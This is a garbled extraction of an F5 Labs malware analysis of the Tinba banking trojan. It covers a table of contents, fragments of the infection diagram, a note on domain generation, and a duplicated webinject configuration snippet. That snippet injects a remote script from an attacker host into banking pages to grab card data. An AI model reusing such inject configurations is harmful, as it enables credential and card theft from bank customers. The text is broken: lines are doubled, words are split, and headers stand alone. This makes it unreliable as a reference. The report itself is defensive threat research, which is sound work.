Table of Contents 2 - f5.com

Table of Contents .................................................................................................................... 2

Table of Figures ....................................................................................................................... 2

THE THREAT ............................................................................................................................. 4 Trojans ............................................................................................................................................. 4 Script Injections ................................................................................................................................ 4

SUMMARY OF THE ATTACK ...................................................................................................... 4

MALWARE ANALYSIS DETAILS .................................................................................................. 6 Dropper Infection ............................................................................................................................. 6 Hooking System Functions ................................................................................................................ 6 Autorun Locations ............................................................................................................................ 7 Deployment on Disk ......................................................................................................................... 7 Hooking the Browsers and Lowering Security .................................................................................... 8 Rootkit ............................................................................................................................................. 8

Registry .................................................................................................................................................... 9 Files .......................................................................................................................................................... 9

Communication with C&C ............................................................................................................... 10 Downloading the Webinject Configuration File from the C&C .......................................................... 11 Posting Stolen Data To The Drop Zone............................................................................................. 12 The Configuration File ..................................................................................................................... 12 Configuration File Structure ............................................................................................................ 14 Tinba C&C Panel ............................................................................................................................. 14

MAN IN THE BROWSER INJECTIONS ........................................................................................ 15 Specially Crafted Online Banking Injections ..................................................................................... 15 Generic VBV Grabber ...................................................................................................................... 16 CC+VBV Grabber ............................................................................................................................. 17

ATSEngine Panel .................................................................................................................................... 19 Stolen Credentials ................................................................................................................................. 19

TINBA DETAILS AND DETECTION RATIO ................................................................................... 19 Anti-Virus Scanning Results ............................................................................................................. 19 About F5 Labs ................................................................................................................................. 22

•

•

User

Bank

Spam Malware

Code Injection Login Credentials

Drop Zone Transfer Botmaster

The user re ceives spam email and gets

infected with Tinba malware

Tinba steals login credentials and injects malicious

HTML/JavaScript code into the user’s browser. The stolen

information is sent to the C&C server.

The attacker uses the stolen information for various

fraudulent activities such as performing transactions

and selling/ using stolen credit cards.

PROCESS NAME

PROCESS ID

THREAD ID

OPERATION PATH DETAIL

PROCESS NAME

PROCESS ID


•

•

•

PROCESS NAME

PROCESS ID


PROCESS NAME

PROCESS ID


Registry

Files

Figure 5 : The C: \ Documents and Settings \ Administrator \ Application Data \ 557 CEB7B \ folder as seen from IceSword.

The m alware uses a hard - coded algorithm to generate random domains to which it will send DNS queries. This gives the attackers the ability to install a new C&C server if an old one has been taken down by I nternet authorities. This way, the m alware can come back to life without the need to infect the bots with a new binary.

•

•

•

•

•

•

•

•

set_url *book* GP set_url *pay* GP data_before

data_before data_end data_end

data_inject data_inject <script> <script> var myComputer = "%BOTID%"; var myComputer = "%BOTID%"; </script> </script> <script <script

src="https://omtorwa.com/vbvgr/src/x.js"></sc src="https://omtorwa.com/vbvgr/src/x.js"></sc

ript> ript> data_end data_end

data_after data_after

</head> </head> data_end data_end

ATSEngine Panel

Stolen Credentials

mailto:[email protected]




Table of Contents 2 - f5.com

Documents

Transcript of Table of Contents 2 - f5.com